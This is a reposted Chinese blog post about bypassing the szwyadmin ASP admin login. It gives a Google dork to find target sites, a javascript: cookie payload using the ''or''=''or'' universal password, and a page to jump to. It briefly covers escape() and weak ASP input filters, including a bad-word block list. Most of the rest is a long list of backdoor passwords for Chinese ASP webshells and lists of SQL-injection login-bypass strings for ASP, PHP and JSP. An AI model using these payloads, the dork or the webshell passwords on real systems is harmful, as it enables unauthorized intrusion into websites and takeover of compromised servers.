码迷,mamicode.com
首页 > 其他好文 > 详细

你的漏洞真的补了?万能再袭

时间:2014-08-04 01:41:46      阅读:1160      评论:0      收藏:0      [点我收藏+]

标签:blog   http   java   使用   os   io   文件   数据   

先声明:拿站凭良心,不要瞎搞,逆天只是讲解一个技术,你们要是瞎搞,自己负责,与我无关!


补漏洞的时候记得两点:1.你所信任的是否安全;2.能否举一反三 

看正文:(szwyadmin漏洞:利用cookies和万能密码实现入侵)
 
谷歌:inurl:szwyadmin/login.asp
 
比如我在搜索的网站中选了这个网站
 
入侵代码:(复制,放到地址栏里面,会弹2个警告框,点确定就ok了)
javascript:alert(document.cookie="adminuser="+escape("‘or‘=‘or‘"));javascript:alert(document.cookie="adminpass="+escape("‘or‘=‘or‘"))
 
 
替换代码:
代码2:admin_index.asp
 
 
这样我们就可以进去了      入侵网站就是这样,  
 
 
其实这个就是运用了万能密码和cookies相结合的一个应用,其本质就是万能密码过滤不到位导致的!

看图实战:
 
bubuko.com,布布扣

bubuko.com,布布扣

bubuko.com,布布扣

bubuko.com,布布扣

bubuko.com,布布扣

bubuko.com,布布扣

bubuko.com,布布扣

——————————懒人直接绕过,下面是讲解,上面利用的部分已经讲完了——————————
 
【逆天讲解:】
 
JavaScript escape() 函数 【这里用这个函数来骗网站的验证】
定义和用法
escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串。
 
语法
escape(string)
 
参数描述
string必需。要被转义或编码的字符串。
 
返回值
已编码的 string 的副本。其中某些字符被替换成了十六进制的转义序列。
 
说明
该方法不会对 ASCII 字母和数字进行编码,也不会对下面这些 ASCII 标点符号进行编码: * @ - _ + . / 。其他所有的字符都会被转义序列替换。
 
提示和注释
提示:可以使用 unescape() 对 escape() 编码的字符串进行解码。
注释:ECMAScript v3 反对使用该方法,应用使用 decodeURI() 和 decodeURIComponent() 替代它。
 
实例
在本例中,我们将使用 escape() 来编码字符串:
<script type="text/javascript">
 
document.write(escape("Visit W3School!") + "<br />")
document.write(escape("?!=()#%&"))
 
</script>
 
输出:【是不是有效的骗过了我们的眼睛?】
Visit%20W3School%21
%3F%21%3D%28%29%23%25%26
 
【追述本源】
 
修补也就是重新过滤一下万能密码,不能总是只针对对 ‘ 来修补漏洞,要对or之类的关键词也有限定(逆天建议) 
 
以前的修补方法:
 
方法1: Replace过滤字符 【一骗就过去了。。。】
 
  解决方法:查找login.asp下的
 
  username=request.Form("name")
 
  pass=request.Form("pass")
 
  修改为:
 
  username=Replace(request.Form("name"), "‘", "‘‘")
 
  pass=Replace(request.Form("pass"), "‘", "‘‘")
 
  语法是屏蔽‘和‘‘字符来达到效果.
 
 
方法2:在conn.asp 内加入
注前提 登陆页面有)
把以下代码保存为safe.asp
 
程序代码【没把or也加进去】
 
<%
 
Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name
 
Err_Message = 3
 
Err_Web = “safe.htm”
 
’出错时转向的页面
 
Query_Badword=”’|and|select|update|chr|delete|%20from|;|insert|mid|master.|set|chr(37)|=”
 
’在这部份定义get非法参数,使用”|”号间隔
 
Form_Badword=”’|(|)|;|=”       
 
’在这部份定义post非法参数,使用”|”号间隔
 
On Error Resume Next
 
if request.QueryString”" then
 
Chk_badword=split(Query_Badword,”|”)
 
FOR EACH Query_Name IN Request.QueryString
 
for i=0 to ubound(Chk_badword)
 
If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))0 Then
 
Select Case Err_Message
 
Case “1″
 
Response.Write “alert(’传参错误!参数 “&name&” 的值中包含非法字符串!\n\n请不要在参数中出现:and update delete ; insert mid master 等非法字符!’);window.close();”
 
Case “2″
 
Response.Write “location.href=’”&Err_Web&”’”
 
Case “3″
 
Response.Write “alert(’传参错误!参数 “&name&”的值中包含非法字符串!\n\n请不要在参数中出现:and update delete ; insert mid master 等非法字
 
符!’);location.href=’”&Err_Web&”’;”
 
End Select
 
Response.End
 
End If
 
NEXT
 
NEXT
 
End if
 
if request.form”" then
 
Chk_badword=split(Form_Badword,”|”)
 
FOR EACH name IN Request.Form
 
for i=0 to ubound(Chk_badword)
 
If Instr(LCase(request.form(name)),Chk_badword(i))0 Then
 
Select Case Err_Message
 
Case “1″
 
Response.Write “alert(’出错了!表单 “&name&” 的值中包含非法字符串!\n\n你的非法操作已记录,请马上停止非法行为!’);window.close();”
 
Case “2″
 
Response.Write “location.href=’”&Err_Web&”’”
 
Case “3″
 
Response.Write “alert(’出错了!参数 “&name&”的值中包含非法字符串!\n\谢谢您光临!,请停止非法行为!’);location.href=’”&Err_Web&”’;”
 
End Select
 
Response.End
 
End If
 
NEXT
 
NEXT
 
end if
 
%>
 
【拓展:国内流行的asp大马后门的万能密码和以前的万能密码】
 
这些大马基本就是国内流行的asp木马,如果你日站捡到这些大马,可以用这些密码试试,有的是搜集的万能密码,有的是默认密码
还有哪个黑阔搜集的有发来给我,我全部贴出来给大家
正文:
黑羽基地免杀asp大马 密码5201314
Asp站长助手6.0 密码584521
web综合安全评测 – Beta3 密码nohack
未知数X 密码45189946
baidu}” 密码baidu
路遥知马力 密码123
黑客网站之家 美化版 密码chenxue
Thé、End.゛ 密码and QQ:913720787
笑佛天下 密码cnot
西域小刚-站长助手-修改版本 密码xxoxx
XXXXX 密码rinima
暗组超强功能修正去后门加强S-U提权版 密码hkk007
黑客官方-长期提供网站**,密码破解 数据库** 密码chengnuo
ASPAdmin_A 密码”5556661221″ ’123456
火狐ASP木马(超强版)” 密码wrsk
雨夜孤魂 密码54321
Dark Security Team 密码yuemo
随风自由的泪 密码jcksyes
伟大的农民 密码521
mr.con asp小马 密码*******
JspX 密码4lert
围剿专版 密码yuemo
maek dream 密码hacker
Shell 密码xxxxx
靈魂◆安全小组+” 密码10011C120105101
银河安全网 密码fclshark
ASPXSpy 密码19880118
Dark 密码376186027
No Backdoor Webshell(刀) 密码admin
 
黑勇士shell勇士版 密码654321
小武来了 密码535039
Evil sadness 密码admin
F.S.T 联盟交流群内部版!!!别外传噢 密码000
独自等待专用 密码123
windows 密码 123
[D.s.T]会员专用WebShell 密码darkst
我要进去’ 密码jcksyes
Hacker’Rose 密码123456
随风自由的泪 密码jcksyes
F.S.T 海盗内部版.!别外传噢。by 海盗 密码 jinjin
WebShell 6.0 VIP(密码防破解版 密码 12345
JFeng 密码sq19880602
Evil sadness 密码 jtk2352
路遥知马力 密码sq19880602
奥运专版网站维护工具(加强版)” 密码 kill
Edu黑客官方 密码chengnuo
未知数X 密码45189946
心动吧ASP超级提权修正加强版20080124 密码123321
2010贺岁版 免杀 WebShell 密码admin
Michael、T 专用asp提权木马 密码hacker
Evil sadness 密码admin
邪恶的装逼大叔冰菊 密码admin
【HACKYONG】最终版 密码haode
芝麻开门 密码chuang
aiezu 密码981246
萧萧文件管理 密码et520
Password: 密码
 
winner
冷血 密码12
奥运专版网站维护工具(加强版 密码20080808
by:空气 密码yrpx
暗组超强功能修正去后门加强S-U提权版 密码hkk007
火狐ASP木马(超强版)” 华夏五周年庆典版 密码wrsk
(中国数据) 密码rinima
asp 黑客→kissy 密码ceshi2009
Evil sadness 密码5201314
F.S.T 联盟交流群内部版.!别外传噢 密码rfkl
username 密码847381979
这是一个没有信仰的年代 密码
 
jing
伟 密码winner
沙漠之烟 密码4816535
去演绎神话吧’ 密码zhack
Sam,asp大马修正加强版 QQ:42466841 密码mama520
fuck you 密码123go
小武来了 密码1
Baiki-” 密码1
Login 密码888999
E.V.A.V 专 用 网 马『修改版』密码13572468
月满西楼 密码sasa
蛋蛋WEBSHELL鼠年增强版 密码dangdang
乄缘來④妳专版免杀asp大马 密码lovehack7758
F.S.T 联盟交流群内部版.!别外传噢 密码rfkl
暗组超强功能修正去后门加强S-U提权版 密码123
80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp hkmm
G.xp 专用 密码133135136
Satan 密码1992724
F.S.T 联盟交流群内部版!!!别外传噢!!! 密码yong
Evil sadness 密码noid
懂你味道 密码caodan
黑鹰专用WEBSHELL 密码96315001
思易免杀ASP木马3.0(最新两款) 密码admin
TX-网络专用ASP木马 密码axiao
username 密码847381979
F.S.T 联盟交流群内部版.!别外传噢。” 密码rfkl
GHOST永久免杀ASP木马 ghost 密码yuemo
围剿专版 +口令 密码yuemo
Miracle个人专用 密码12
小武来了 密码535039
唐宋元明清╯” 密码bzxyd
安全检测 {BY:網丄邻居} |” 密码tonecan
我要进去’ 密码bzxyd
Evil sadness 密码5201314
3E Security Team 密码3est
败家简单前后门 密码sin
F.S.T 海盗内部版.!别外传噢。by 海盗 密码654321
蓝色灭杀 密码ghost
HqzX 密码C
F.S.T 联盟交流群内部版!!!别外传噢!!!” 密码yong
webadmin2 密码webadmin
HqzX’s Blog 密码
login蓝色 密码5909062xzx
红盟太子 iolhcw19891209
岁月联盟 (?Copyright (C) 2004 Security Angel Team [SYUE] All Rights Reserved.) 密码 hehe
 
一、asp aspx万能密码
 
1:"or "a"="a
2: ‘)or(‘a‘=‘a 
3:or 1=1–
4:‘or 1=1–
5:a‘or‘ 1=1–
6:"or 1=1–
7:‘or‘a‘=‘a
8:"or"="a‘=‘a
9:‘or‘‘=‘
10:‘or‘=‘or‘
11: 1 or ‘1‘=‘1‘=1
12: 1 or ‘1‘=‘1‘ or 1=1
13:‘or 1=1 or ‘1‘=‘1
14: ‘OR 1=1%00 
15: "or 1=1%00
16: ‘xor 
17: 用户名 ‘ UNION Select 1,1,1 FROM admin Where ‘‘=‘ (替换表名admin)
密码 1
18:1′or’1′=’1
19:admin’or’1′=’1′– 
20:or 1=1– ‘
21:” or “a”=”a
22:‘or’ ’1′=’1
23:admin‘ or ‘a‘=‘a 密码随便
24: "or 1=1%00
25: ‘OR 1=1%00 
最短的:’or’1
 
二、PHP万能密码
 
‘or 1=1/*
User: something 
Pass: ‘ OR ‘1‘=‘1
 
三、jsp 万能密码
 
1‘or‘1‘=‘1
admin‘ OR 1=1/*

你的漏洞真的补了?万能再袭,布布扣,bubuko.com

你的漏洞真的补了?万能再袭

标签:blog   http   java   使用   os   io   文件   数据   

原文地址:http://www.cnblogs.com/dunitian/p/3889028.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!